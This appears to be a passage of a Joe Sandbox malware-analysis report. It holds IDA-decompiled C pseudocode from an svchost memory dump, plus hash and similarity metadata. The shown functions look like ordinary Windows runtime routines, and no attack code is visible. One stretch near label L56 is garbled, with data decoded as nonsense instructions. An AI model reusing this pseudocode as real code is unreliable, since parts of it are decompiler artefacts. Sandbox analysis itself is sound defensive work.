                                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                          											 *(_t114 - 4) = 1;
                                          											_push(_t114 - 0x74);
                                          											L03A7DEF0(_t99, _t106);
                                          											 *(_t114 - 4) = 0xfffffffe;
                                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                          											goto L3;
                                          										}
                                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                          											goto L40;
                                          										}
                                          										_push( *((intOrPtr*)(_t114 + 8)));
                                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                          										_push(_t99 & 0x0000ffff);
                                          										_push(_t108);
                                          										_push(1);
                                          										_t101 = E03A6B280();
                                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                          										if( *((char*)(_t114 + 0x14)) == 1) {
                                          											__eflags = _t101 - 0x80000003;
                                          											if(_t101 == 0x80000003) {
                                          												E03A6B7E0(1);
                                          												_t101 = 0;
                                          												__eflags = 0;
                                          											}
                                          										}
                                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                          										goto L4;
                                          									}
                                          									__eflags = _t109 - 0x80000005;
                                          									if(_t109 == 0x80000005) {
                                          										continue;
                                          									}
                                          									break;
                                          								}
                                          								 *(_t114 - 0x90) = 0;
                                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                          								_t91 = E03A6E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                          								_t115 = _t115 + 0x10;
                                          								_t104 = _t91;
                                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                          								__eflags = _t104;
                                          								if(_t104 < 0) {
                                          									L21:
                                          									_t109 = 0x80000005;
                                          									 *(_t114 - 0x90) = 0x80000005;
                                          									L22:
                                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                          									L23:
                                          									 *(_t114 - 0x94) = _t109;
                                          									goto L26;
                                          								}
                                          								__eflags = _t104 - _t92;
                                          								if(__eflags > 0) {
                                          									goto L21;
                                          								}
                                          								if(__eflags == 0) {
                                          									goto L22;
                                          								}
                                          								goto L23;
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					__eflags = _t109;
                                          					if(_t109 >= 0) {
                                          						goto L31;
                                          					}
                                          					__eflags = _t109 - 0x80000005;
                                          					if(_t109 != 0x80000005) {
                                          						goto L31;
                                          					}
                                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                          					_t38 = _t95 - 1; // -129
                                          					_t99 = _t38;
                                          					goto L34;
                                          				}
                                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          					__eflags = __edx - 0x65;
                                          					if(__edx != 0x65) {
                                          						goto L2;
                                          					}
                                          					goto L6;
                                          				}
                                          				L2:
                                          				_push( *((intOrPtr*)(_t114 + 8)));
                                          				_push(_t106);
                                          				if(E03A6A890() != 0) {
                                          					goto L6;
                                          				}
                                          				goto L3;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: 6ddfeb00815f7c6eb29714a06d97e0f258f1f9ec81aaa0412a0c3e59d962741b
                                          • Instruction ID: f03908faf01b9b91676a66ccde5b6dc5b6d057bef2285f9a637814e7490e0189
                                          • Opcode Fuzzy Hash: 6ddfeb00815f7c6eb29714a06d97e0f258f1f9ec81aaa0412a0c3e59d962741b
                                          • Instruction Fuzzy Hash: 9051F175D0436A8FDF30EF69C944BAEBBB4BF08710F1545AFD859AB281D77049428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E03A4B944(signed int* __ecx, char __edx) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				signed int* _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				char _v77;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t67;
                                          				intOrPtr _t68;
                                          				char* _t73;
                                          				intOrPtr _t77;
                                          				intOrPtr _t78;
                                          				signed int _t82;
                                          				intOrPtr _t83;
                                          				void* _t87;
                                          				char _t88;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t91;
                                          				void* _t97;
                                          				intOrPtr _t100;
                                          				void* _t102;
                                          				void* _t107;
                                          				signed int _t108;
                                          				intOrPtr* _t112;
                                          				void* _t113;
                                          				intOrPtr* _t114;
                                          				intOrPtr _t115;
                                          				intOrPtr _t116;
                                          				intOrPtr _t117;
                                          				signed int _t118;
                                          				void* _t130;
                                          
                                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                          				_v8 =  *0x3b1d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                          				_t112 = __ecx;
                                          				_v77 = __edx;
                                          				_v48 = __ecx;
                                          				_v28 = 0;
                                          				_t5 = _t112 + 0xc; // 0x575651ff
                                          				_t105 =  *_t5;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				if(_t105 == 0) {
                                          					_t50 = _t112 + 4; // 0x5de58b5b
                                          					_t60 =  *__ecx |  *_t50;
                                          					if(( *__ecx |  *_t50) != 0) {
                                          						 *__ecx = 0;
                                          						__ecx[1] = 0;
                                          						if(E03A47D50() != 0) {
                                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t65 = 0x7ffe0386;
                                          						}
                                          						if( *_t65 != 0) {
                                          							E03AF8CD6(_t112);
                                          						}
                                          						_push(0);
                                          						_t52 = _t112 + 0x10; // 0x778df98b
                                          						_push( *_t52);
                                          						_t60 = E03A69E20();
                                          					}
                                          					L20:
                                          					_pop(_t107);
                                          					_pop(_t113);
                                          					_pop(_t87);
                                          					return E03A6B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                          				}
                                          				_t8 = _t112 + 8; // 0x8b000cc2
                                          				_t67 =  *_t8;
                                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                          				_t108 =  *(_t67 + 0x14);
                                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                          				_t105 = 0x2710;
                                          				asm("sbb eax, edi");
                                          				_v44 = _t88;
                                          				_v52 = _t108;
                                          				_t60 = E03A6CE00(_t97, _t68, 0x2710, 0);
                                          				_v56 = _t60;
                                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                          					L3:
                                          					 *(_t112 + 0x44) = _t60;
                                          					_t105 = _t60 * 0x2710 >> 0x20;
                                          					 *_t112 = _t88;
                                          					 *(_t112 + 4) = _t108;
                                          					_v20 = _t60 * 0x2710;
                                          					_v16 = _t60 * 0x2710 >> 0x20;
                                          					if(_v77 != 0) {
                                          						L16:
                                          						_v36 = _t88;
                                          						_v32 = _t108;
                                          						if(E03A47D50() != 0) {
                                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t73 = 0x7ffe0386;
                                          						}
                                          						if( *_t73 != 0) {
                                          							_t105 = _v40;
                                          							E03AF8F6A(_t112, _v40, _t88, _t108);
                                          						}
                                          						_push( &_v28);
                                          						_push(0);
                                          						_push( &_v36);
                                          						_t48 = _t112 + 0x10; // 0x778df98b
                                          						_push( *_t48);
                                          						_t60 = E03A6AF60();
                                          						goto L20;
                                          					} else {
                                          						_t89 = 0x7ffe03b0;
                                          						do {
                                          							_t114 = 0x7ffe0010;
                                          							do {
                                          								_t77 =  *0x3b18628; // 0x0
                                          								_v68 = _t77;
                                          								_t78 =  *0x3b1862c; // 0x0
                                          								_v64 = _t78;
                                          								_v72 =  *_t89;
                                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                                          								while(1) {
                                          									_t105 =  *0x7ffe000c;
                                          									_t100 =  *0x7ffe0008;
                                          									if(_t105 ==  *_t114) {
                                          										goto L8;
                                          									}
                                          									asm("pause");
                                          								}
                                          								L8:
                                          								_t89 = 0x7ffe03b0;
                                          								_t115 =  *0x7ffe03b0;
                                          								_t82 =  *0x7FFE03B4;
                                          								_v60 = _t115;
                                          								_t114 = 0x7ffe0010;
                                          								_v56 = _t82;
                                          							} while (_v72 != _t115 || _v76 != _t82);
                                          							_t83 =  *0x3b18628; // 0x0
                                          							_t116 =  *0x3b1862c; // 0x0
                                          							_v76 = _t116;
                                          							_t117 = _v68;
                                          						} while (_t117 != _t83 || _v64 != _v76);
                                          						asm("sbb edx, [esp+0x24]");
                                          						_t102 = _t100 - _v60 - _t117;
                                          						_t112 = _v48;
                                          						_t91 = _v44;
                                          						asm("sbb edx, eax");
                                          						_t130 = _t105 - _v52;
                                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                          							_t88 = _t102 - _t91;
                                          							asm("sbb edx, edi");
                                          							_t108 = _t105;
                                          						} else {
                                          							_t88 = 0;
                                          							_t108 = 0;
                                          						}
                                          						goto L16;
                                          					}
                                          				} else {
                                          					if( *(_t112 + 0x44) == _t60) {
                                          						goto L20;
                                          					}
                                          					goto L3;
                                          				}
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A4B9A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: d62957c3495962487cf41ae6b5900e62bd80b1e42f7cbf422bb7a090f69240ca
                                          • Instruction ID: e25ce04fd16497866e8a630655ed832cf80c6918435a0d77fffdb2b4289df8cb
                                          • Opcode Fuzzy Hash: d62957c3495962487cf41ae6b5900e62bd80b1e42f7cbf422bb7a090f69240ca
                                          • Instruction Fuzzy Hash: 7F513571A08344CFC720DF29C18092ABBF9BBC8654F58896FE9D59B354D771E844CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E03A52581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				unsigned int _v24;
                                          				void* _v28;
                                          				signed int _v32;
                                          				unsigned int _v36;
                                          				void* _v37;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				intOrPtr _v1524072449;
                                          				intOrPtr _v1524085249;
                                          				signed int _t240;
                                          				signed int _t244;
                                          				signed int _t246;
                                          				signed int _t249;
                                          				signed int _t251;
                                          				intOrPtr _t253;
                                          				signed int _t256;
                                          				signed int _t263;
                                          				signed int _t266;
                                          				signed int _t274;
                                          				intOrPtr _t280;
                                          				signed int _t282;
                                          				signed int _t284;
                                          				signed int _t289;
                                          				signed int _t290;
                                          				unsigned int _t293;
                                          				signed int _t297;
                                          				signed int _t299;
                                          				signed int _t303;
                                          				intOrPtr _t315;
                                          				signed int _t324;
                                          				signed int _t326;
                                          				signed int _t327;
                                          				signed int _t331;
                                          				signed int _t332;
                                          				void* _t336;
                                          				signed int _t337;
                                          				signed int _t339;
                                          				signed int _t342;
                                          				void* _t343;
                                          				void* _t346;
                                          				void* _t347;
                                          
                                          				_t339 = _t342;
                                          				_t343 = _t342 - 0x4c;
                                          				_v8 =  *0x3b1d360 ^ _t339;
                                          				_push(__ebx);
                                          				_push(__esi);
                                          				_push(__edi);
                                          				_t331 = 0x3b1b2e8;
                                          				_v56 = _a4;
                                          				_v48 = __edx;
                                          				_v60 = __ecx;
                                          				_t293 = 0;
                                          				_v80 = 0;
                                          				asm("movsd");
                                          				_v64 = 0;
                                          				_v76 = 0;
                                          				_v72 = 0;
                                          				asm("movsd");
                                          				_v44 = 0;
                                          				_v52 = 0;
                                          				_v68 = 0;
                                          				asm("movsd");
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				asm("movsd");
                                          				_v16 = 0;
                                          				_t347 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                          				_t280 = 0x48;
                                          				_t313 = 0 | _t347 == 0x00000000;
                                          				_t324 = 0;
                                          				_v37 = _t347 == 0;
                                          				if(_v48 <= 0) {
                                          					L16:
                                          					_t45 = _t280 - 0x48; // 0x0
                                          					__eflags = _t45 - 0xfffe;
                                          					if(_t45 > 0xfffe) {
                                          						_t332 = 0xc0000106;
                                          						goto L32;
                                          					} else {
                                          						_t331 = L03A44620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
                                          						_v52 = _t331;
                                          						__eflags = _t331;
                                          						if(_t331 == 0) {
                                          							_t332 = 0xc0000017;
                                          							goto L32;
                                          						} else {
                                          							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
                                          							_t50 = _t331 + 0x48; // 0x48
                                          							_t326 = _t50;
                                          							_t313 = _v32;
                                          							 *((intOrPtr*)(_t331 + 0x3c)) = _t280;
                                          							_t282 = 0;
                                          							 *((short*)(_t331 + 0x30)) = _v48;
                                          							__eflags = _t313;
                                          							if(_t313 != 0) {
                                          								 *(_t331 + 0x18) = _t326;
                                          								__eflags = _t313 - 0x3b18478;
                                          								 *_t331 = ((0 | _t313 == 0x03b18478) - 0x00000001 & 0xfffffffb) + 7;
                                          								E03A6F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
                                          								_t313 = _v32;
                                          								_t343 = _t343 + 0xc;
                                          								_t282 = 1;
                                          								__eflags = _a8;
                                          								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
                                          								if(_a8 != 0) {
                                          									_t274 = E03AB39F2(_t326);
                                          									_t313 = _v32;
                                          									_t326 = _t274;
                                          								}
                                          							}
                                          							_t297 = 0;
                                          							_v16 = 0;
                                          							__eflags = _v48;
                                          							if(_v48 <= 0) {
                                          								L31:
                                          								_t332 = _v68;
                                          								__eflags = 0;
                                          								 *((short*)(_t326 - 2)) = 0;
                                          								goto L32;
                                          							} else {
                                          								_t284 = _t331 + _t282 * 4;
                                          								_v56 = _t284;
                                          								do {
                                          									__eflags = _t313;
                                          									if(_t313 != 0) {
                                          										_t240 =  *(_v60 + _t297 * 4);
                                          										__eflags = _t240;
                                          										if(_t240 == 0) {
                                          											goto L30;
                                          										} else {
                                          											__eflags = _t240 == 5;
                                          											if(_t240 == 5) {
                                          												goto L30;
                                          											} else {
                                          												goto L22;
                                          											}
                                          										}
                                          									} else {
                                          										L22:
                                          										 *_t284 =  *(_v60 + _t297 * 4);
                                          										 *(_t284 + 0x18) = _t326;
                                          										_t244 =  *(_v60 + _t297 * 4);
                                          										__eflags = _t244 - 8;
                                          										if(_t244 > 8) {
                                          											goto L56;
                                          										} else {
                                          											switch( *((intOrPtr*)(_t244 * 4 +  &M03A52959))) {
                                          												case 0:
                                          													__ax =  *0x3b18488;
                                          													__eflags = __ax;
                                          													if(__ax == 0) {
                                          														goto L29;
                                          													} else {
                                          														__ax & 0x0000ffff = E03A6F3E0(__edi,  *0x3b1848c, __ax & 0x0000ffff);
                                          														__eax =  *0x3b18488 & 0x0000ffff;
                                          														goto L26;
                                          													}
                                          													goto L108;
                                          												case 1:
                                          													L45:
                                          													E03A6F3E0(_t326, _v80, _v64);
                                          													_t269 = _v64;
                                          													goto L26;
                                          												case 2:
                                          													 *0x3b18480 & 0x0000ffff = E03A6F3E0(__edi,  *0x3b18484,  *0x3b18480 & 0x0000ffff);
                                          													__eax =  *0x3b18480 & 0x0000ffff;
                                          													__eax = ( *0x3b18480 & 0x0000ffff) >> 1;
                                          													__edi = __edi + __eax * 2;
                                          													goto L28;
                                          												case 3:
                                          													__eax = _v44;
                                          													__eflags = __eax;
                                          													if(__eax == 0) {
                                          														goto L29;
                                          													} else {
                                          														__esi = __eax + __eax;
                                          														__eax = E03A6F3E0(__edi, _v72, __esi);
                                          														__edi = __edi + __esi;
                                          														__esi = _v52;
                                          														goto L27;
                                          													}
                                          													goto L108;
                                          												case 4:
                                          													_push(0x2e);
                                          													_pop(__eax);
                                          													 *(__esi + 0x44) = __edi;
                                          													 *__edi = __ax;
                                          													__edi = __edi + 4;
                                          													_push(0x3b);
                                          													_pop(__eax);
                                          													 *(__edi - 2) = __ax;
                                          													goto L29;
                                          												case 5:
                                          													__eflags = _v36;
                                          													if(_v36 == 0) {
                                          														goto L45;
                                          													} else {
                                          														E03A6F3E0(_t326, _v76, _v36);
                                          														_t269 = _v36;
                                          													}
                                          													L26:
                                          													_t343 = _t343 + 0xc;
                                          													_t326 = _t326 + (_t269 >> 1) * 2 + 2;
                                          													__eflags = _t326;
                                          													L27:
                                          													_push(0x3b);
                                          													_pop(_t271);
                                          													 *((short*)(_t326 - 2)) = _t271;
                                          													goto L28;
                                          												case 6:
                                          													__ebx =  *0x3b1575c;
                                          													__eflags = __ebx - 0x3b1575c;
                                          													if(__ebx != 0x3b1575c) {
                                          														_push(0x3b);
                                          														_pop(__esi);
                                          														do {
                                          															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                          															E03A6F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                          															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                          															__edi = __edi + __eax * 2;
                                          															__edi = __edi + 2;
                                          															 *(__edi - 2) = __si;
                                          															__ebx =  *__ebx;
                                          															__eflags = __ebx - 0x3b1575c;
                                          														} while (__ebx != 0x3b1575c);
                                          														__esi = _v52;
                                          														__ecx = _v16;
                                          														__edx = _v32;
                                          													}
                                          													__ebx = _v56;
                                          													goto L29;
                                          												case 7:
                                          													 *0x3b18478 & 0x0000ffff = E03A6F3E0(__edi,  *0x3b1847c,  *0x3b18478 & 0x0000ffff);
                                          													__eax =  *0x3b18478 & 0x0000ffff;
                                          													__eax = ( *0x3b18478 & 0x0000ffff) >> 1;
                                          													__eflags = _a8;
                                          													__edi = __edi + __eax * 2;
                                          													if(_a8 != 0) {
                                          														__ecx = __edi;
                                          														__eax = E03AB39F2(__ecx);
                                          														__edi = __eax;
                                          													}
                                          													goto L28;
                                          												case 8:
                                          													__eax = 0;
                                          													 *(__edi - 2) = __ax;
                                          													 *0x3b16e58 & 0x0000ffff = E03A6F3E0(__edi,  *0x3b16e5c,  *0x3b16e58 & 0x0000ffff);
                                          													 *(__esi + 0x38) = __edi;
                                          													__eax =  *0x3b16e58 & 0x0000ffff;
                                          													__eax = ( *0x3b16e58 & 0x0000ffff) >> 1;
                                          													__edi = __edi + __eax * 2;
                                          													__edi = __edi + 2;
                                          													L28:
                                          													_t297 = _v16;
                                          													_t313 = _v32;
                                          													L29:
                                          													_t284 = _t284 + 4;
                                          													__eflags = _t284;
                                          													_v56 = _t284;
                                          													goto L30;
                                          											}
                                          										}
                                          									}
                                          									goto L108;
                                          									L30:
                                          									_t297 = _t297 + 1;
                                          									_v16 = _t297;
                                          									__eflags = _t297 - _v48;
                                          								} while (_t297 < _v48);
                                          								goto L31;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					while(1) {
                                          						L1:
                                          						_t244 =  *(_v60 + _t324 * 4);
                                          						if(_t244 > 8) {
                                          							break;
                                          						}
                                          						switch( *((intOrPtr*)(_t244 * 4 +  &M03A52935))) {
                                          							case 0:
                                          								__ax =  *0x3b18488;
                                          								__eflags = __ax;
                                          								if(__ax != 0) {
                                          									__eax = __ax & 0x0000ffff;
                                          									__ebx = __ebx + 2;
                                          									__eflags = __ebx;
                                          									goto L53;
                                          								}
                                          								goto L14;
                                          							case 1:
                                          								L44:
                                          								_t313 =  &_v64;
                                          								_v80 = E03A52E3E(0,  &_v64);
                                          								_t280 = _t280 + _v64 + 2;
                                          								goto L13;
                                          							case 2:
                                          								__eax =  *0x3b18480 & 0x0000ffff;
                                          								__ebx = __ebx + __eax;
                                          								__eflags = __dl;
                                          								if(__dl != 0) {
                                          									__eax = 0x3b18480;
                                          									goto L80;
                                          								}
                                          								goto L14;
                                          							case 3:
                                          								__eax = E03A3EEF0(0x3b179a0);
                                          								__eax =  &_v44;
                                          								_push(__eax);
                                          								_push(0);
                                          								_push(0);
                                          								_push(4);
                                          								_push(L"PATH");
                                          								_push(0);
                                          								L57();
                                          								__esi = __eax;
                                          								_v68 = __esi;
                                          								__eflags = __esi - 0xc0000023;
                                          								if(__esi != 0xc0000023) {
                                          									L10:
                                          									__eax = E03A3EB70(__ecx, 0x3b179a0);
                                          									__eflags = __esi - 0xc0000100;
                                          									if(__esi == 0xc0000100) {
                                          										_v44 = _v44 & 0x00000000;
                                          										__eax = 0;
                                          										_v68 = 0;
                                          										goto L13;
                                          									} else {
                                          										__eflags = __esi;
                                          										if(__esi < 0) {
                                          											L32:
                                          											_t218 = _v72;
                                          											__eflags = _t218;
                                          											if(_t218 != 0) {
                                          												L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                          											}
                                          											_t219 = _v52;
                                          											__eflags = _t219;
                                          											if(_t219 != 0) {
                                          												__eflags = _t332;
                                          												if(_t332 < 0) {
                                          													L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
                                          													_t219 = 0;
                                          												}
                                          											}
                                          											goto L36;
                                          										} else {
                                          											__eax = _v44;
                                          											__ebx = __ebx + __eax * 2;
                                          											__ebx = __ebx + 2;
                                          											__eflags = __ebx;
                                          											L13:
                                          											_t293 = _v36;
                                          											goto L14;
                                          										}
                                          									}
                                          								} else {
                                          									__eax = _v44;
                                          									__ecx =  *0x3b17b9c; // 0x0
                                          									_v44 + _v44 =  *[fs:0x30];
                                          									__ecx = __ecx + 0x180000;
                                          									__eax = L03A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                          									_v72 = __eax;
                                          									__eflags = __eax;
                                          									if(__eax == 0) {
                                          										__eax = E03A3EB70(__ecx, 0x3b179a0);
                                          										__eax = _v52;
                                          										L36:
                                          										_pop(_t325);
                                          										_pop(_t333);
                                          										__eflags = _v8 ^ _t339;
                                          										_pop(_t281);
                                          										return E03A6B640(_t219, _t281, _v8 ^ _t339, _t313, _t325, _t333);
                                          									} else {
                                          										__ecx =  &_v44;
                                          										_push(__ecx);
                                          										_push(_v44);
                                          										_push(__eax);
                                          										_push(4);
                                          										_push(L"PATH");
                                          										_push(0);
                                          										L57();
                                          										__esi = __eax;
                                          										_v68 = __eax;
                                          										goto L10;
                                          									}
                                          								}
                                          								goto L108;
                                          							case 4:
                                          								__ebx = __ebx + 4;
                                          								goto L14;
                                          							case 5:
                                          								_t276 = _v56;
                                          								if(_v56 != 0) {
                                          									_t313 =  &_v36;
                                          									_t278 = E03A52E3E(_t276,  &_v36);
                                          									_t293 = _v36;
                                          									_v76 = _t278;
                                          								}
                                          								if(_t293 == 0) {
                                          									goto L44;
                                          								} else {
                                          									_t280 = _t280 + 2 + _t293;
                                          								}
                                          								goto L14;
                                          							case 6:
                                          								__eax =  *0x3b15764 & 0x0000ffff;
                                          								goto L53;
                                          							case 7:
                                          								__eax =  *0x3b18478 & 0x0000ffff;
                                          								__ebx = __ebx + __eax;
                                          								__eflags = _a8;
                                          								if(_a8 != 0) {
                                          									__ebx = __ebx + 0x16;
                                          									__ebx = __ebx + __eax;
                                          								}
                                          								__eflags = __dl;
                                          								if(__dl != 0) {
                                          									__eax = 0x3b18478;
                                          									L80:
                                          									_v32 = __eax;
                                          								}
                                          								goto L14;
                                          							case 8:
                                          								__eax =  *0x3b16e58 & 0x0000ffff;
                                          								__eax = ( *0x3b16e58 & 0x0000ffff) + 2;
                                          								L53:
                                          								__ebx = __ebx + __eax;
                                          								L14:
                                          								_t324 = _t324 + 1;
                                          								if(_t324 >= _v48) {
                                          									goto L16;
                                          								} else {
                                          									_t313 = _v37;
                                          									goto L1;
                                          								}
                                          								goto L108;
                                          						}
                                          					}
                                          					L56:
                                          					asm("int 0x29");
                                          					asm("out 0x28, al");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					_t346 = _t343 +  *((intOrPtr*)(_t331 + 0x28)) + _t244;
                                          					asm("daa");
                                          					asm("movsd");
                                          					asm("es movsd");
                                          					asm("movsd");
                                          					_t246 = _t244 +  *((intOrPtr*)(_t331 + 0x28)) +  *0x1f03a526;
                                          					__eflags = _t246 & 0xa5289403;
                                          					_v1524072449 = _v1524072449 - _t346;
                                          					asm("daa");
                                          					asm("movsd");
                                          					_v1524085249 = _v1524085249 - _t246;
                                          					asm("movsd");
                                          					_t289 = 0x25;
                                          					__eflags = _t246 & 0xa528b403;
                                          					_t336 = _t331 +  *0x203a95b + _t331 +  *0x203a95b +  *((intOrPtr*)(_t346 + _t289 * 2));
                                          					__eflags = _t246 & 0xcccccc03;
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					_push(0x20);
                                          					_push(0x3afff00);
                                          					E03A7D08C(_t289, _t326, _t336);
                                          					_v44 =  *[fs:0x18];
                                          					_t327 = 0;
                                          					 *_a24 = 0;
                                          					_t290 = _a12;
                                          					__eflags = _t290;
                                          					if(_t290 == 0) {
                                          						_t249 = 0xc0000100;
                                          					} else {
                                          						_v8 = 0;
                                          						_t337 = 0xc0000100;
                                          						_v52 = 0xc0000100;
                                          						_t251 = 4;
                                          						while(1) {
                                          							_v40 = _t251;
                                          							__eflags = _t251;
                                          							if(_t251 == 0) {
                                          								break;
                                          							}
                                          							_t303 = _t251 * 0xc;
                                          							_v48 = _t303;
                                          							__eflags = _t290 -  *((intOrPtr*)(_t303 + 0x3a01664));
                                          							if(__eflags <= 0) {
                                          								if(__eflags == 0) {
                                          									_t266 = E03A6E5C0(_a8,  *((intOrPtr*)(_t303 + 0x3a01668)), _t290);
                                          									_t346 = _t346 + 0xc;
                                          									__eflags = _t266;
                                          									if(__eflags == 0) {
                                          										_t337 = E03AA51BE(_t290,  *((intOrPtr*)(_v48 + 0x3a0166c)), _a16, _t327, _t337, __eflags, _a20, _a24);
                                          										_v52 = _t337;
                                          										break;
                                          									} else {
                                          										_t251 = _v40;
                                          										goto L62;
                                          									}
                                          									goto L70;
                                          								} else {
                                          									L62:
                                          									_t251 = _t251 - 1;
                                          									continue;
                                          								}
                                          							}
                                          							break;
                                          						}
                                          						_v32 = _t337;
                                          						__eflags = _t337;
                                          						if(_t337 < 0) {
                                          							__eflags = _t337 - 0xc0000100;
                                          							if(_t337 == 0xc0000100) {
                                          								_t299 = _a4;
                                          								__eflags = _t299;
                                          								if(_t299 != 0) {
                                          									_v36 = _t299;
                                          									__eflags =  *_t299 - _t327;
                                          									if( *_t299 == _t327) {
                                          										_t337 = 0xc0000100;
                                          										goto L76;
                                          									} else {
                                          										_t315 =  *((intOrPtr*)(_v44 + 0x30));
                                          										_t253 =  *((intOrPtr*)(_t315 + 0x10));
                                          										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t299;
                                          										if( *((intOrPtr*)(_t253 + 0x48)) == _t299) {
                                          											__eflags =  *(_t315 + 0x1c);
                                          											if( *(_t315 + 0x1c) == 0) {
                                          												L106:
                                          												_t337 = E03A52AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
                                          												_v32 = _t337;
                                          												__eflags = _t337 - 0xc0000100;
                                          												if(_t337 != 0xc0000100) {
                                          													goto L69;
                                          												} else {
                                          													_t327 = 1;
                                          													_t299 = _v36;
                                          													goto L75;
                                          												}
                                          											} else {
                                          												_t256 = E03A36600( *(_t315 + 0x1c));
                                          												__eflags = _t256;
                                          												if(_t256 != 0) {
                                          													goto L106;
                                          												} else {
                                          													_t299 = _a4;
                                          													goto L75;
                                          												}
                                          											}
                                          										} else {
                                          											L75:
                                          											_t337 = E03A52C50(_t299, _a8, _t290, _a16, _a20, _a24, _t327);
                                          											L76:
                                          											_v32 = _t337;
                                          											goto L69;
                                          										}
                                          									}
                                          									goto L108;
                                          								} else {
                                          									E03A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          									_v8 = 1;
